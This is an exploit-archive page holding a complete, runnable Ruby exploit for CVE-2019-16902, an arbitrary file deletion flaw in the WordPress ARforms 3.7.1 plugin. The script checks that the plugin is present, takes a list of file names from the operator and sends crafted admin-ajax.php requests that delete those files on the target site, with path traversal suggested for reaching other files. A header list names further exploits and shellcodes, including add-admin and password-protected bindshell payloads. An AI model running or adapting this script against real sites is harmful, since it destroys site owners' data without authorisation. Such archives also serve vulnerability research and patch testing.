
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
238 lines
No EOL
8.3 KiB
Ruby
Executable file
238 lines
No EOL
8.3 KiB
Ruby
Executable file
#!/usr/bin/env ruby
|
|
|
|
# Exploit Title: WordPress Arforms - 3.7.1
|
|
# CVE ID: CVE-2019-16902
|
|
# Date: 2019-09-27
|
|
# Exploit Author: Ahmad Almorabea
|
|
# Author Website: http://almorabea.net
|
|
# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt
|
|
# Software Link: https://www.arformsplugin.com/documentation/changelog/
|
|
# Version: 3.7.1
|
|
|
|
#**************Start Notes**************
|
|
# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders.
|
|
# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet.
|
|
# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143.
|
|
# But maybe in other forms maybe it's different so you have to change it accordingly.
|
|
# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on
|
|
# There is a request file with this Script make sure to put it in the same folder.
|
|
#**************End Notes****************
|
|
|
|
require "net/http"
|
|
require 'colorize'
|
|
|
|
$host = ARGV[0] || ""
|
|
$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"
|
|
|
|
|
|
|
|
def start_function ()
|
|
|
|
puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow
|
|
name = STDIN.gets
|
|
|
|
if $host == ""
|
|
puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red
|
|
exit
|
|
end
|
|
|
|
|
|
check_existence_arform_folder
|
|
execute_deletion_attack
|
|
|
|
puts "Done ... see ya " + name
|
|
|
|
end
|
|
|
|
|
|
def send_checks(files_names)
|
|
|
|
|
|
|
|
|
|
j = 1
|
|
while j <= files_names.length-1
|
|
|
|
uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j])
|
|
http = Net::HTTP.new(uri.host, uri.port)
|
|
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
|
|
|
|
request = Net::HTTP::Get.new(uri.request_uri)
|
|
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
|
|
request["Connection"] = "keep-alive"
|
|
request["Accept-Language"] = "en-US,en;q=0.5"
|
|
request["Accept-Encoding"] = "gzip, deflate"
|
|
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
|
|
|
|
|
|
begin
|
|
|
|
response = http.request(request).code
|
|
puts "The File " + files_names[j] + " has the response code of " + response
|
|
rescue Exception => e
|
|
puts "[!] Failed!"
|
|
puts e
|
|
end
|
|
j = j+1
|
|
end
|
|
end
|
|
|
|
|
|
def check_existence_arform_folder ()
|
|
|
|
|
|
|
|
path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"]
|
|
$i = 0
|
|
results = []
|
|
|
|
while $i <= path_array.length-1
|
|
|
|
uri = URI.parse("http://#{$host}/#{path_array[$i]}")
|
|
#puts uri
|
|
http = Net::HTTP.new(uri.host, uri.port)
|
|
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
|
|
request = Net::HTTP::Get.new(uri.request_uri)
|
|
response = http.request(request)
|
|
results[$i] = response.code
|
|
#puts"response code is : " + response.code
|
|
|
|
$i +=1
|
|
|
|
end
|
|
|
|
puts "****************************************************"
|
|
|
|
if results[0] == "200" || results[0] =="301"
|
|
|
|
puts "The Plugin is Available on the following path : ".green + $host + path_array[0]
|
|
else
|
|
puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red
|
|
exit
|
|
end
|
|
|
|
if (results[1] == "200" || results[1] == "301")
|
|
|
|
puts "The User Files folder is Available on the following path : ".green + $host + path_array[1]
|
|
else
|
|
|
|
puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1]
|
|
|
|
end
|
|
puts "****************************************************"
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
def execute_deletion_attack ()
|
|
|
|
|
|
|
|
puts "How many file you want to delete my man"
|
|
amount = STDIN.gets.chomp.to_i
|
|
|
|
if(amount == 0)
|
|
puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue
|
|
exit
|
|
end
|
|
|
|
file_names = []
|
|
file_names[0] = "143_772_1569713145702_temp3.txt"
|
|
j = 1
|
|
while j <= amount.to_i
|
|
puts "Name of the file number " + j.to_s
|
|
file_names[j] = STDIN.gets
|
|
file_names[j].strip!
|
|
j = j+1
|
|
end
|
|
|
|
|
|
uri = URI.parse("http://#{$host}")
|
|
#puts uri
|
|
http = Net::HTTP.new(uri.host, uri.port)
|
|
http.use_ssl = true if uri.scheme == 'https'
|
|
request = Net::HTTP::Get.new(uri.request_uri)
|
|
response = http.request(request)
|
|
global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie
|
|
|
|
|
|
|
|
|
|
$i = 0
|
|
while $i <= file_names.length-1
|
|
|
|
puts "Starting the Attack Journey .. ".green
|
|
|
|
uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
|
|
headers =
|
|
{
|
|
'Referer' => 'From The Sky',
|
|
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
|
|
'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615',
|
|
'Accept-Encoding' => 'gzip, deflate',
|
|
'Cookie' => global_cookie,
|
|
'X_FILENAME' => file_names[$i],
|
|
'X-FILENAME' => file_names[$i],
|
|
'Connection' => 'close'
|
|
|
|
}
|
|
|
|
http = Net::HTTP.new(uri.host, uri.port)
|
|
http.use_ssl = true if uri.scheme == 'https'
|
|
request = Net::HTTP::Post.new(uri.path, headers)
|
|
request.body = File.read("post_file")
|
|
response = http.request request
|
|
|
|
$i = $i +1
|
|
end
|
|
|
|
execute_delete_request file_names,global_cookie,amount.to_i
|
|
|
|
puts "Finished.........."
|
|
|
|
end
|
|
|
|
def execute_delete_request (file_names,cookies,rounds )
|
|
|
|
|
|
$i = 0
|
|
|
|
while $i <= file_names.length-1
|
|
|
|
puts "Starting the Attack on file No #{$i.to_s} ".green
|
|
|
|
uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
|
|
headers =
|
|
{
|
|
'Referer' => 'From The Sky',
|
|
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
|
|
'Accept' => '*/*',
|
|
'Accept-Language' => 'en-US,en;q=0.5',
|
|
'X-Requested-With'=> 'XMLHttpRequest',
|
|
'Cookie' => cookies,
|
|
'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
|
|
'Accept-Encoding' => 'gzip, deflate',
|
|
'Connection' => 'close'
|
|
}
|
|
|
|
http = Net::HTTP.new(uri.host, uri.port)
|
|
http.use_ssl = true if uri.scheme == 'https'
|
|
request = Net::HTTP::Post.new(uri.path,headers)
|
|
request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143"
|
|
response = http.request(request)
|
|
|
|
if $i != 0
|
|
puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code
|
|
end
|
|
$i = $i +1
|
|
|
|
end
|
|
|
|
send_checks file_names
|
|
|
|
end
|
|
|
|
|
|
start_function() |